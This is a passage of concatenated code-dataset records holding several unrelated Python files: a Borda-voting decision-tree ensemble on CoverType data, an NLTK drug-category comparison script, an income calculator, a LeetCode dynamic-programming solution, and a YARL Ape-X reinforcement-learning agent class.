' + str(child3.text.encode(\"utf-8\")) + '


'\n if child3.tag == 'description':\n try:\n string += str(child3.text.encode(\"utf-8\"))\n except AttributeError:\n string += ''\n\nfile = open(\"../views/canthia.html\", \"w\")\nhead = open(\"../head/head.html\", \"r\")\nheadread = head.read()\nfile.write(headread + \"\\n\" + string + \"\\n\" + \"\")\nfile.close()\nhead.close()\n\nprint(\"canthia doned\")\n","sub_path":"scripts/canthia.py","file_name":"canthia.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"492626290","text":"# Borda Voting. CoverType Data.\n#-------------------------------------------------------------------------------------\n# Class Label (1-7) Last attribute. \n#-------------------------------------------------------------------------------------\nimport timeit\nstart = timeit.default_timer()\n\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.decomposition import PCA\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn import model_selection\nfrom sklearn.tree import DecisionTreeClassifier\nimport sklearn\nimport numpy as np\nimport scipy.stats as ss\n\n\n\n#Open/load training data for CoverType. Training & testing are both same. \n#Will need to split into training/test sets (CrossValidation/Holdout)\ntrain_file = open('covtype.data', 'r').read().split(\"\\n\")\ntrain_file.pop() #remove last element in list, the extra ' '\n\n\n# Organize the training data. Convert the 1D list of strings (individual records) into a \n# 2D list of integer attributes, where each row is a single record. Final format of \n# training data will look like: [[1, 2,...55 attributes], [record2],...[record581,012]] \ntrainset = []\nfor single_record in train_file:\n\tsingle_record = single_record.split(',')\n\t# Turn the list of string attributes into integers.\n\tsingle_recordInt = list(map(int, single_record)) \n\ttrainset.append(single_recordInt)\n\n\n# Extract training class labels for each record/row and add it to a separate list. \n# It will always be the last attribute, so pop the last value in each sublist. This is a \n# 1D list of class labels. \ntrainset_labelsY = []\nfor single_record in trainset:\n\tlabel = single_record.pop()\n\ttrainset_labelsY.append(label)\n\n\t\n\t\n# print(trainset)\n# print(trainset_labelsY)\n# print(len(trainset))\n# print(len(trainset_labelsY))\n\n\n# Set aside some of the training set, \"trainset\" for Cross Validation/Holdout. We will call\n# this the \"testset\". We will have approximately a 70-30 split. Where 70% of data is \n# training and 30% is the test set.\noriginal_trainsetlen = len(trainset)\noriginal_trainsetlnY = len(trainset_labelsY)\nN = int(len(trainset)*.70)\n\ntestset = trainset[N:]\ntrainset = trainset[:N]\n\ntestset_labelsY = trainset_labelsY[N:]\ntrainset_labelsY = trainset_labelsY[:N]\n\n#------------------------------------------\n# Normalize the training data: \nscaler = Normalizer().fit(trainset)\ntrainset = scaler.transform(trainset)\n\n\n# Normalize the test data: Don't need if using KFold Validation.\nscaler_test = Normalizer().fit(testset)\ntestset = scaler_test.transform(testset)\n\n\n# Instantiate the PCA tool to transform the data using Principal Component Analysis.\npca = PCA()\n\n# Transform the training data so you have a PCA-transformed data set.\ntrainset = pca.fit_transform(trainset)\n\n# transform test data using the previously fitted PCA object. \ntestset = pca.transform(testset)\n\n\nprint(\"GOT HERE!\")\n# ------------------ BORDA VOTING IMPlEMAENTATION?---------------------------\n# Borda Counting Method Function\ndef myborda(probs):\n probrank=[]\n \n for i in range(probs.shape[0]):\n probrank.append(ss.rankdata(probs[i,:],method='average')-1)\n \n probrank=np.array(probrank)\n #print(probrank)\n \n ranksums=np.sum(probrank,0)\n #print(ranksums)\n \n #return the column index of the class with the max number of points\n return np.argmax(ranksums)\n\n\nlist_ensemble_accuracy = []\nfor i in range(10):\n\t#Bagging Samples, each row of mega_index is a sample\n\t# each column of a row being the index of trainset to be included in the sample\n\tnum_trees = 20\n\n\tmega_index=np.random.randint(len(trainset),size=(num_trees,int(len(trainset)*(2/3))))\n\n\t# print(mega_index)\n# \tprint(len(mega_index[0]))\n# \tprint(len(mega_index))\n\n# grab the training data at that specific index for each subsample. Bagging Model.\n\tsub_samples_x = []\n\tsub_samples_y = []\n\tfor row in mega_index:\n\t\tlist_samples = []\n\t\tlist_samples_y = []\n\t\tfor col in row:\n\t\t\trecord = trainset[col]\n\t\t\trecord_y = trainset_labelsY[col]\n\t\t\tlist_samples.append(record)\n\t\t\tlist_samples_y.append(record_y)\n\t\tsub_samples_x.append(list_samples)\n\t\tsub_samples_y.append(list_samples_y)\n\t\n\n\n\t# Create three decision trees. for ensemble\n\tmaster_DT = DecisionTreeClassifier(max_depth = 7, random_state = 42)\n\n\tfit0 = master_DT.fit(sub_samples_x[0], sub_samples_y[0])\n\tfit1 = master_DT.fit(sub_samples_x[1], sub_samples_y[1])\n\tfit2 = master_DT.fit(sub_samples_x[2], sub_samples_y[2])\n\tfit3 = master_DT.fit(sub_samples_x[3], sub_samples_y[3])\n\tfit4 = master_DT.fit(sub_samples_x[4], sub_samples_y[4])\n\tfit5 = master_DT.fit(sub_samples_x[5], sub_samples_y[5])\n\tfit6 = master_DT.fit(sub_samples_x[6], sub_samples_y[6])\n\tfit7 = master_DT.fit(sub_samples_x[7], sub_samples_y[7])\n\tfit8 = master_DT.fit(sub_samples_x[8], sub_samples_y[8])\n\tfit9 = master_DT.fit(sub_samples_x[9], sub_samples_y[9])\n\tfit10 = master_DT.fit(sub_samples_x[10], sub_samples_y[10])\n\tfit11 = master_DT.fit(sub_samples_x[11], sub_samples_y[11])\n\tfit12 = master_DT.fit(sub_samples_x[12], sub_samples_y[12])\n\tfit13 = master_DT.fit(sub_samples_x[13], sub_samples_y[13])\n\tfit14 = master_DT.fit(sub_samples_x[14], sub_samples_y[14])\n\tfit15 = master_DT.fit(sub_samples_x[15], sub_samples_y[15])\n\tfit16 = master_DT.fit(sub_samples_x[16], sub_samples_y[16])\n\tfit17 = master_DT.fit(sub_samples_x[17], sub_samples_y[17])\n\tfit18 = master_DT.fit(sub_samples_x[18], sub_samples_y[18])\n\tfit19 = master_DT.fit(sub_samples_x[19], sub_samples_y[19])\n\n\n\n\t# Posterior probabilities of each of the bagged decision trees. \n\tprobs0 = fit0.predict_proba(testset)\n\tprobs1 = fit1.predict_proba(testset)\n\tprobs2 = fit2.predict_proba(testset)\n\tprobs3 = fit3.predict_proba(testset)\n\tprobs4 = fit4.predict_proba(testset)\n\tprobs5 = fit5.predict_proba(testset)\n\tprobs6 = fit6.predict_proba(testset)\n\tprobs7 = fit7.predict_proba(testset)\n\tprobs8 = fit8.predict_proba(testset)\n\tprobs9 = fit9.predict_proba(testset)\n\tprobs10 = fit10.predict_proba(testset)\n\tprobs11 = fit11.predict_proba(testset)\n\tprobs12 = fit12.predict_proba(testset)\n\tprobs13 = fit13.predict_proba(testset)\n\tprobs14 = fit14.predict_proba(testset)\n\tprobs15 = fit15.predict_proba(testset)\n\tprobs16 = fit15.predict_proba(testset)\n\tprobs17 = fit17.predict_proba(testset)\n\tprobs18 = fit18.predict_proba(testset)\n\tprobs19 = fit19.predict_proba(testset)\n\n\n\tpredictions = []\n\tindex_probs = 0 \n\tfor record in testset:\n\t\tnew_probs_list = []\n\t\tnew_probs_list.append(probs0[index_probs])\n\t\tnew_probs_list.append(probs1[index_probs])\n\t\tnew_probs_list.append(probs2[index_probs])\n\t\tnew_probs_list.append(probs3[index_probs])\n\t\tnew_probs_list.append(probs4[index_probs])\n\t\tnew_probs_list.append(probs5[index_probs])\n\t\tnew_probs_list.append(probs6[index_probs])\n\t\tnew_probs_list.append(probs7[index_probs])\n\t\tnew_probs_list.append(probs8[index_probs])\n\t\tnew_probs_list.append(probs9[index_probs])\n\t\tnew_probs_list.append(probs10[index_probs])\n\t\tnew_probs_list.append(probs11[index_probs])\n\t\tnew_probs_list.append(probs12[index_probs])\n\t\tnew_probs_list.append(probs13[index_probs])\n\t\tnew_probs_list.append(probs14[index_probs])\n\t\tnew_probs_list.append(probs15[index_probs])\n\t\tnew_probs_list.append(probs16[index_probs])\n\t\tnew_probs_list.append(probs17[index_probs])\n\t\tnew_probs_list.append(probs18[index_probs])\n\t\tnew_probs_list.append(probs19[index_probs])\n\t\n\t\tnew_probs_list=np.array(new_probs_list)\n\t\tborda_predict = myborda(new_probs_list)\n\t\tpredictions.append((master_DT.classes_[borda_predict]))\n\t\tindex_probs += 1\n\n\n\taccuracy = sklearn.metrics.accuracy_score(testset_labelsY, predictions)\n\tlist_ensemble_accuracy.append(accuracy)\n\tprint(\"ADDED ACCURACY: \", i)\n\t\n\n\nlist_ensemble_accuracy = np.array(list_ensemble_accuracy)\n\n\n\n\nprint(\"Borda Voting. Cover Type. Not Normalized/PCA. Max_depth 7: \")\nprint(list_ensemble_accuracy)\nprint(\"MIN: \", list_ensemble_accuracy.min())\nprint(\"MAX: \", list_ensemble_accuracy.max())\nprint(\"MEAN: \", list_ensemble_accuracy.mean())\n\n\n# print(sub_samples_x)\n# print(sub_samples_x[0])\n# print(sub_samples_y)\n# print(sub_samples_y[0])\n# print(predictions)\n# print(len(predictions))\n\t\t\n\n\n\n# Calculates average runtime of the code.\nstop = timeit.default_timer()\n\nprint('Time: ', stop - start) \n\n\n\n\n","sub_path":"Borda Voting (CoverType).py","file_name":"Borda Voting (CoverType).py","file_ext":"py","file_size_in_byte":8108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"433943388","text":"from DrugWeb import *\nimport nltk\nfrom nltk.book import FreqDist\nimport math\nfrom collections import Counter\nfrom operator import itemgetter\n\ncondtions = [\"depression\",\"chickenpox\",\"flu\",\"rheumatoid arthritis\",\"crohn's disease\",\"alzheimer's\",\"heart disease\",\"erectile dysfunction\",\"high blood pressure\",\"hypothyroidism\",\"cholesterol\"]\nweb = DrugWeb(\"DrugWeb\")\n\nallCategories=web.get_all_cats()\nallCategories = [item[1:len(item)-1] for item in allCategories]\n\ndef readDrugCategoryFile(website):\n dir = 'drugCategoriesExtracted/drugCategoriesExtracted'\n fileName = \"\"\n if website == 'NHS':\n fileName = dir + \"NHS.txt\"\n elif website == 'HEALTHLINE':\n fileName = dir + 'HEATHLINE.txt'\n elif website == 'MAYO':\n fileName = dir + 'MAYO.txt'\n elif website =='WEBMD':\n fileName = dir + 'WEBMD.txt'\n\n conditionAndCategories = {}\n with open(fileName)as f:\n lines = [line.strip('\\n') for line in f]\n for line in lines:\n drugcategories = []\n line = line.split('\\t')\n condition = line[0]\n for i in range(1, len(line)):\n phrase = line[i]\n if phrase:\n drugcategories = drugcategories + [phrase]\n conditionAndCategories[condition] = drugcategories\n return conditionAndCategories\n\ndef normalizeData(drugCategories):\n for key in drugCategories:\n for x in range(0,len(drugCategories[key])):\n if drugCategories[key][x].endswith('y'):\n drugCategories[key][x]=drugCategories[key][x][0:len(drugCategories[key][x])-1]\n drugCategories[key][x] = drugCategories[key][x] + \"ies\"\n #print(drugCategories[key][x])\n elif not drugCategories[key][x].endswith('s'):\n drugCategories[key][x] = drugCategories[key][x] + \"s\"\n #print(drugCategories[key][x])\n return drugCategories\n\ndef lcs(S,T):\n m = len(S)\n n = len(T)\n counter = [[0]*(n+1) for x in range(m+1)]\n longest = 0\n lcs_set = set()\n for i in range(m):\n for j in range(n):\n if S[i] == T[j]:\n c = counter[i][j] + 1\n counter[i+1][j+1] = c\n if c > longest:\n lcs_set = set()\n longest = c\n lcs_set.add(S[i-c+1:i+1])\n elif c == longest:\n lcs_set.add(S[i-c+1:i+1])\n\n return lcs_set\n\ndef minimumEditDistance(s1,s2):\n if len(s1) > len(s2):\n s1,s2 = s2,s1\n distances = range(len(s1) + 1)\n for index2,char2 in enumerate(s2):\n newDistances = [index2+1]\n for index1,char1 in enumerate(s1):\n if char1 == char2:\n newDistances.append(distances[index1])\n else:\n newDistances.append(1 + min((distances[index1],\n distances[index1+1],\n newDistances[-1])))\n distances = newDistances\n return distances[-1]\n\n\ndef getDrugCategories(categoryList):\n temp = [nltk.word_tokenize(sent) for sent in allCategories]\n temp = [nltk.pos_tag(item, tagset= 'universal') for item in temp]\n grammar = r\"\"\"\n X:\n {<.*>+} # Chunk everything\n }+{ # Chink sequences of VBD and IN\n \"\"\"\n cp = nltk.RegexpParser(grammar)\n #print(allCategories)\n #print(temp)\n\n trees = {}\n i=0\n for sent in temp:\n trees[allCategories[i]]=cp.parse(sent)\n i=i+1\n\n #print(trees)\n allCategoriesChinked={}\n for key in trees:\n chunks = []\n for tree in trees[key].subtrees():\n if tree.label() == 'X':\n chunks.append(nltk.untag(tree.leaves()))\n allCategoriesChinked[key]=chunks\n #print(allCategoriesChinked)\n\n allCategoriesReDefined = {}\n for key in allCategoriesChinked:\n chunks = []\n for item in allCategoriesChinked[key]:\n chunks.append(\" \".join(item))\n allCategoriesReDefined[key] = chunks\n\n #print(allCategoriesReDefined)\n\n #print(categoryList)\n\n finalCategories = []\n for extractedCategory in categoryList:\n for key in allCategoriesReDefined:\n for generalCategory in allCategoriesReDefined[key]:\n dist = minimumEditDistance(generalCategory,extractedCategory)\n if dist/min(len(generalCategory),len(extractedCategory))<0.47:\n finalCategories.append(key)\n #print(key,\": \",extractedCategory)\n #str = lcs(generalCategory,extractedCategory)\n #if len(str)/min(len(generalCategory),len(extractedCategory)) >= 0.8:\n #print(key,\": \",extractedCategory)\n return finalCategories\n\n\n\ndef filterDrugsCategoriesNHS(condition):\n drugCategories = readDrugCategoryFile('NHS')\n #print(drugCategories)\n drugCategories = normalizeData(drugCategories)\n #print(drugCategories)\n #print(drugCategories[condition])\n categoryList = drugCategories[condition]\n categoryList1 = [item for item in categoryList if web.is_cat(item)]\n\n NHSList = getDrugCategories(categoryList) + categoryList1\n return list(set(NHSList))\n\n#print(filterDrugsCategoriesNHS(condtions[2]))\n\n\ndef filterDrugsCategoriesHEALTHLINE(condition):\n drugCategories = readDrugCategoryFile('HEALTHLINE')\n #print(drugCategories)\n drugCategories = normalizeData(drugCategories)\n #print(drugCategories)\n #print(drugCategories[condition])\n categoryList = drugCategories[condition]\n categoryList1 = [item for item in categoryList if web.is_cat(item)]\n\n HEALTHLINEList = getDrugCategories(categoryList) + categoryList1\n return list(set(HEALTHLINEList))\n\n#print(filterDrugsCategoriesHEALTHLINE(condtions[2]))\n\ndef filterDrugsCategoriesMAYO(condition):\n drugCategories = readDrugCategoryFile('MAYO')\n #print(drugCategories)\n drugCategories = normalizeData(drugCategories)\n #print(drugCategories)\n #print(drugCategories[condition])\n categoryList = drugCategories[condition]\n categoryList1 = [item for item in categoryList if web.is_cat(item)]\n\n MAYOList = getDrugCategories(categoryList) + categoryList1\n return list(set(MAYOList))\n\n#print(filterDrugsCategoriesMAYO(condtions[2]))\n\ndef filterDrugsCategoriesWEBMD(condition):\n drugCategories = readDrugCategoryFile('WEBMD')\n #print(drugCategories)\n drugCategories = normalizeData(drugCategories)\n #print(drugCategories)\n #print(drugCategories[condition])\n categoryList = drugCategories[condition]\n categoryList1 = [item for item in categoryList if web.is_cat(item)]\n\n WEBMDList = getDrugCategories(categoryList) + categoryList1\n return list(set(WEBMDList))\n\n#print(filterDrugsCategoriesHEALTHLINE(condtions[2]))\n\n\ndef calCosinSimilarity(c1, c2):\n terms = set(c1).union(c2)\n dotprod = sum(c1.get(k, 0) * c2.get(k, 0) for k in terms)\n magA = math.sqrt(sum(c1.get(k, 0)**2 for k in terms))\n magB = math.sqrt(sum(c2.get(k, 0)**2 for k in terms))\n return dotprod / (magA * magB)\n\n\n\n#Gets Most Common Drug Categories\ndef getMostCommonDrugsCategories(condition):\n medications = filterDrugsCategoriesMAYO(condition)+ filterDrugsCategoriesHEALTHLINE(condition) + filterDrugsCategoriesWEBMD(condition) + filterDrugsCategoriesNHS(condition)\n commonMeds = FreqDist(medications)\n return [item for (item, x) in commonMeds.most_common(4)]\n\nprint(getMostCommonDrugsCategories(condtions[2]))\n\n\n\n#this function returns two closest websites\ndef similarWebSites(condition):\n cosSim={}\n cosSimValues={}\n\n cosSim[\"webMD\"] = Counter(filterDrugsCategoriesWEBMD(condition))\n cosSim[\"mayoClinic\"] = Counter(filterDrugsCategoriesMAYO(condition))\n cosSim[\"healthline\"] = Counter(filterDrugsCategoriesHEALTHLINE(condition))\n cosSim[\"nhs\"] = Counter(filterDrugsCategoriesNHS(condition))\n #print(nhs)\n #print(webmd)\n a= [(key1,key2)for key1 in cosSim for key2 in cosSim if key1 !=key2]\n b=[(item,calCosinSimilarity(cosSim[item[0]],cosSim[item[1]])) for item in a]\n return max(b,key=itemgetter(1))[0]\n\nprint(similarWebSites(condtions[2]))","sub_path":"project/commonDrugCategories.py","file_name":"commonDrugCategories.py","file_ext":"py","file_size_in_byte":8170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"36801898","text":"currency = input(\"What Currency Do You Use?\\n\")\nrate = float(input(\"How Much Money Do You Earn Per Hour? \\n\"))\nhours = float(input(\"How Many Hours Do You Work Per Day?\\n\"))\ndays = float(input(\"How Many Days Per Month Do You Work?\\n\"))\nannually = float(input(\"How Many Months Per Year Do You Work?\\n\"))\n\nmonth = str((hours * days) * rate)\nmonths = float((hours * days) * rate)\nyear = str(months * annually)\nprint(\"You Earn \" + currency + month + \" Per Month.\")\nprint(\"You Earn \" + currency + year + \" Per Year.\")\nprint(\"Thanks For Using My Income Calc. Don't Forget To Follow Me On GitHub.\")","sub_path":"IncomeCalc.py","file_name":"IncomeCalc.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"203068292","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2018/7/8 下午5:38\n@Author : libing\n@Email : icearl@qq.com\n@File : 115_Distinct Subsequences.py\n@Software: PyCharm\n\"\"\"\n\n\"\"\" 题目:不同的子序列\n给定一个字符串 S 和一个字符串 T,计算在 S 的子序列中 T 出现的个数。\n\n一个字符串的一个子序列是指,通过删除一些(也可以不删除)字符且不干扰剩余字符相对位置所组成的新字符串。(例如,\"ACE\" 是 \"ABCDE\" 的一个子序列,而 \"AEC\" 不是)\n\n示例 1:\n\n输入: S = \"rabbbit\", T = \"rabbit\"\n输出: 3\n解释:\n\n如下图所示, 有 3 种可以从 S 中得到 \"rabbit\" 的方案。\n(上箭头符号 ^ 表示选取的字母)\n\nrabbbit\n^^^^ ^^\nrabbbit\n^^ ^^^^\nrabbbit\n^^^ ^^^\n示例 2:\n\n输入: S = \"babgbag\", T = \"bag\"\n输出: 5\n解释:\n\n如下图所示, 有 5 种可以从 S 中得到 \"bag\" 的方案。 \n(上箭头符号 ^ 表示选取的字母)\n\nbabgbag\n^^ ^\nbabgbag\n^^ ^\nbabgbag\n^ ^^\nbabgbag\n ^ ^^\nbabgbag\n ^^^\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n 自己写的,用的是递归,时间超时了,应该用下面的 dp 思路\n \"\"\"\n def numDistinct(self, s, t):\n \"\"\"\n :type s: str eg: \"babgbag\"\n :type t: str eg: \"bag\"\n :rtype: int\n \"\"\"\n res_cnt = 0\n for i in range(len(s)):\n if s[i] == t[0]:\n if len(t) == 1:\n res_cnt += 1\n else:\n res_cnt += self.numDistinct(s[i + 1:], t[1:])\n else:\n continue\n return res_cnt\n\n# 用这个\nclass Solution:\n def numDistinct(self, S, T):\n \"\"\"\n 思路:https://shenjie1993.gitbooks.io/leetcode-python/115%20Distinct%20Subsequences.html\n 典型的动态规划问题,dp[i][j]表示字符串S[:i]和T[:j]的不同子序列数目,如果S[i-1]和T[j-1]不相等,\n 那么只能在S[:i-1]和T[:j]中匹配,即dp[i][j] = dp[i-1][j];而当S[i-1]和T[j-1]相等时,\n 可以是这两个字符正好匹配,也可以忽略S[i-1],使T[j-1]在S[:i-1]中匹配,\n 所以dp[i][j] = dp[i - 1][j - 1] + dp[i - 1][j]。\n :type s: str\n :type t: str\n :rtype: int\n \"\"\"\n # dp 保存\n dp = [[0 for j in range(len(T) + 1)] for i in range(len(S) + 1)]\n # 最左边的那列初始化成 1\n for i in range(len(S) + 1):\n dp[i][0] = 1\n # 按上面的思路来\n for i in range(len(S)):\n for j in range(len(T)):\n if S[i] == T[j]:\n dp[i + 1][j + 1] = dp[i][j+1] + dp[i][j]\n else:\n dp[i+1][j+1] = dp[i][j + 1]\n return dp[len(S)][len(T)]\n\nif __name__ == \"__main__\":\n S = \"rabbbit\"\n T = \"rabbit\"\n result = Solution().numDistinct(S, T)\n print(result)","sub_path":"Python/leetcode/115_Distinct Subsequences.py","file_name":"115_Distinct Subsequences.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"322382257","text":"# Copyright 2018 The YARL-Project, All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport copy\nimport numpy as np\n\nfrom yarl.agents import Agent\nfrom yarl.components import CONNECT_ALL, Synchronizable, Merger, Splitter, Memory, DQNLossFunction, PrioritizedReplay, \\\n Policy\nfrom yarl.spaces import Dict, IntBox, FloatBox, BoolBox\n\n\nclass ApexAgent(Agent):\n \"\"\"\n Ape-X is a DQN variant designed for large scale distributed execution where many workers\n share a distributed prioritized experience replay.\n\n Paper: https://arxiv.org/abs/1803.00933\n\n The distinction to standard DQN is mainly that Ape-X needs to provide additional operations\n to enable external updates of priorities. Ape-X also enables per default dueling and double\n DQN.\n \"\"\"\n\n def __init__(self, discount=0.98, memory_spec=None, **kwargs):\n \"\"\"\n Args:\n discount (float): The discount factor (gamma).\n memory_spec (Optional[dict,Memory]): The spec for the Memory to use for the DQN algorithm.\n \"\"\"\n super(ApexAgent, self).__init__(**kwargs)\n\n self.discount = discount\n self.train_time_steps = 0\n\n # Apex always uses prioritized replay (not Memory.from_spec())\n self.memory = PrioritizedReplay.from_spec(memory_spec)\n self.record_space = Dict(states=self.state_space, actions=self.action_space, rewards=float,\n terminals=IntBox(1), add_batch_rank=False)\n\n # The target policy (is synced from the q-net policy every n steps).\n self.target_policy = None\n # The global copy of the q-net (if we are running in distributed mode).\n self.global_qnet = None\n\n # Apex always uses dueling.\n self.policy = Policy(neural_network=self.neural_network, action_adapter_spec=dict(add_dueling_layer=True))\n\n self.merger = Merger(output_space=self.record_space)\n splitter_input_space = copy.deepcopy(self.record_space)\n splitter_input_space[\"next_states\"] = self.state_space\n self.splitter = Splitter(input_space=splitter_input_space)\n self.loss_function = DQNLossFunction(discount=self.discount, double_q=True)\n\n self.assemble_meta_graph()\n self.build_graph()\n\n def _assemble_meta_graph(self, core, *params):\n # Define our interface.\n core.define_inputs(\"states_from_env\", \"external_batch_states\", \"external_batch_next_states\",\n \"states_for_memory\", space=self.state_space.with_batch_rank())\n core.define_inputs(\"actions_for_memory\", \"external_batch_actions\", space=self.action_space.with_batch_rank())\n core.define_inputs(\"rewards_for_memory\", \"external_batch_rewards\", space=FloatBox(add_batch_rank=True))\n core.define_inputs(\"terminals_for_memory\", \"external_batch_terminals\", space=BoolBox(add_batch_rank=True))\n\n #core.define_inputs(\"deterministic\", space=bool)\n core.define_inputs(\"time_step\", space=int)\n core.define_outputs(\"get_actions\", \"insert_records\",\n \"update_from_memory\", \"update_from_external_batch\",\n \"sync_target_qnet\", \"get_batch\", \"get_indices\", \"loss\")\n\n # Add the Q-net, copy it (target-net) and add the target-net.\n self.target_policy = self.policy.copy(scope=\"target-policy\")\n # Make target_policy writable\n self.target_policy.add_component(Synchronizable(), connections=CONNECT_ALL)\n core.add_components(self.policy, self.target_policy)\n # Add an Exploration for the q-net (target-net doesn't need one).\n core.add_components(self.exploration)\n\n # Add our Memory Component plus merger and splitter.\n core.add_components(self.memory, self.merger, self.splitter)\n\n # Add the loss function and optimizer.\n core.add_components(self.loss_function, self.optimizer)\n\n # All external/env states into preprocessor (memory already preprocessed).\n core.connect(\"states_from_env\", (self.preprocessor_stack, \"input\"), label=\"env,s\")\n core.connect(\"external_batch_states\", (self.preprocessor_stack, \"input\"), label=\"ext,s\")\n core.connect(\"external_batch_next_states\", (self.preprocessor_stack, \"input\"), label=\"ext,sp\")\n core.connect((self.preprocessor_stack, \"output\"), (self.policy, \"nn_input\"), label=\"s,sp\")\n\n # Timestep into Exploration.\n core.connect(\"time_step\", (self.exploration, \"time_step\"))\n\n # Policy output into Exploration -> into \"actions\".\n core.connect((self.policy, \"sample_deterministic\"),\n (self.exploration, \"sample_deterministic\"), label=\"env\")\n core.connect((self.policy, \"sample_stochastic\"),\n (self.exploration, \"sample_stochastic\"), label=\"env\")\n core.connect((self.exploration, \"action\"), \"get_actions\")\n #core.connect((self.exploration, \"do_explore\"), \"do_explore\")\n\n # Insert records into memory via merger.\n core.connect(\"states_for_memory\", (self.preprocessor_stack, \"input\"), label=\"to_mem\")\n core.connect((self.preprocessor_stack, \"output\"), (self.merger, \"/states\"), label=\"to_mem\")\n for in_ in [\"actions\", \"rewards\", \"terminals\"]:\n core.connect(in_+\"_for_memory\", (self.merger, \"/\"+in_))\n core.connect((self.merger, \"output\"), (self.memory, \"records\"))\n core.connect((self.memory, \"insert_records\"), \"insert_records\")\n\n # Learn from Memory via get_batch and Splitter.\n core.connect(self.update_spec[\"batch_size\"], (self.memory, \"num_records\"))\n core.connect((self.memory, \"get_records\"), (self.splitter, \"input\"), label=\"mem\")\n\n # To get obtain a batch and its indices.\n core.connect((self.memory, \"get_records\"), \"get_batch\")\n core.connect((self.memory, \"record_indices\"), \"get_indices\")\n\n core.connect((self.splitter, \"/states\"), (self.policy, \"nn_input\"), label=\"mem,s\")\n core.connect((self.splitter, \"/actions\"), (self.loss_function, \"actions\"))\n core.connect((self.splitter, \"/rewards\"), (self.loss_function, \"rewards\"))\n core.connect((self.splitter, \"/terminals\"), (self.loss_function, \"terminals\"))\n core.connect((self.splitter, \"/next_states\"), (self.target_policy, \"nn_input\"), label=\"mem,sp\")\n core.connect((self.splitter, \"/next_states\"), (self.policy, \"nn_input\"), label=\"mem,sp\")\n\n # Only send ext and mem labelled ops into loss function.\n q_values_socket = \"q_values\"\n core.connect((self.policy, q_values_socket), (self.loss_function, \"q_values\"), label=\"ext,mem,s\")\n core.connect((self.target_policy, q_values_socket), (self.loss_function, \"qt_values_s_\"), label=\"ext,mem\")\n core.connect((self.policy, q_values_socket), (self.loss_function, \"q_values_s_\"), label=\"ext,mem,sp\")\n\n # Connect the Optimizer.\n core.connect((self.loss_function, \"loss\"), (self.optimizer, \"loss\"))\n core.connect((self.loss_function, \"loss\"), \"loss\")\n core.connect((self.policy, \"_variables\"), (self.optimizer, \"vars\"))\n core.connect((self.optimizer, \"step\"), \"update_from_memory\", label=\"mem\")\n core.connect((self.optimizer, \"step\"), \"update_from_external_batch\", label=\"ext\")\n\n # Connect loss to updating priority values and indices to update.\n core.connect((self.loss_function, \"loss_per_item\"), (self.memory, \"update\"))\n # TODO correct?\n core.connect((self.memory, \"record_indices\"), (self.memory, \"indices\"))\n\n # Add syncing capability for target-net.\n core.connect((self.policy, \"_variables\"), (self.target_policy, \"_values\"))\n core.connect((self.target_policy, \"sync\"), \"sync_target_qnet\")\n\n def get_action(self, states, deterministic=False):\n batched_states = self.state_space.batched(states)\n remove_batch_rank = batched_states.ndim == np.asarray(states).ndim + 1\n # Increase timesteps by the batch size (number of states in batch).\n self.timesteps += len(batched_states)\n actions = self.graph_executor.execute(\n \"get_actions\", inputs=dict(states_from_env=batched_states, time_step=self.timesteps)\n )\n\n if remove_batch_rank:\n return actions[0]\n return actions\n\n def get_batch(self):\n \"\"\"\n Samples a batch from the priority replay memory.\n\n Returns:\n batch, ndarray: Sample batch and indices sampled.\n \"\"\"\n batch, indices = self.graph_executor.execute(sockets=[\"get_batch\", \"get\"])\n\n # Return indices so we later now which priorities to update.\n return batch, indices\n\n def update_priorities(self, indices, loss):\n \"\"\"\n Updates priorities of provided indices in replay memory via externally\n provided loss.\n\n Args:\n indices (ndarray): Indices to update in replay memory.\n loss (ndarray): Loss values for indices.\n \"\"\"\n self.graph_executor.execute(\n sockets=[\"sample_indices\", \"sample_losses\"],\n inputs=dict(sample_indices=indices, sample_losses=loss)\n )\n\n def _observe_graph(self, states, actions, internals, rewards, terminals):\n self.graph_executor.execute(\"insert_records\", inputs=dict(\n states_for_memory=states,\n actions_for_memory=actions,\n rewards_for_memory=rewards,\n terminals_for_memory=terminals\n ))\n\n def update(self, batch=None):\n # In apex, syncing is based on num steps trained, not steps sampled.\n if (self.train_time_steps - 1) % self.update_spec[\"sync_interval\"] == 0:\n self.graph_executor.execute(\"sync_target_qnet\")\n if batch is None:\n _, loss = self.graph_executor.execute([\"update_from_memory\", \"loss\"])\n else:\n batch_input = dict(\n external_batch_states=batch[\"states\"],\n external_batch_actions=batch[\"actions\"],\n external_batch_rewards=batch[\"rewards\"],\n external_batch_terminals=batch[\"terminals\"],\n external_batch_next_states=batch[\"next_states\"]\n )\n _, loss = self.graph_executor.execute(\n [\"update_from_external_batch\", \"loss\"], inputs=batch_input\n )\n self.train_time_steps += 1\n return loss\n\n def __repr__(self):\n return \"ApexAgent\"\n","sub_path":"yarl/agents/apex_agent.py","file_name":"apex_agent.py","file_ext":"py","file_size_in_byte":11120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"49666940","text":"from os.path import join, abspath\nfrom sliding_window import SlidingWindow\nimport numpy as np\nimport statistics\n\nFINAL_OUTPUT_SAVE_PATH = \"../data/program_output/\"\nFINAL_NAME = 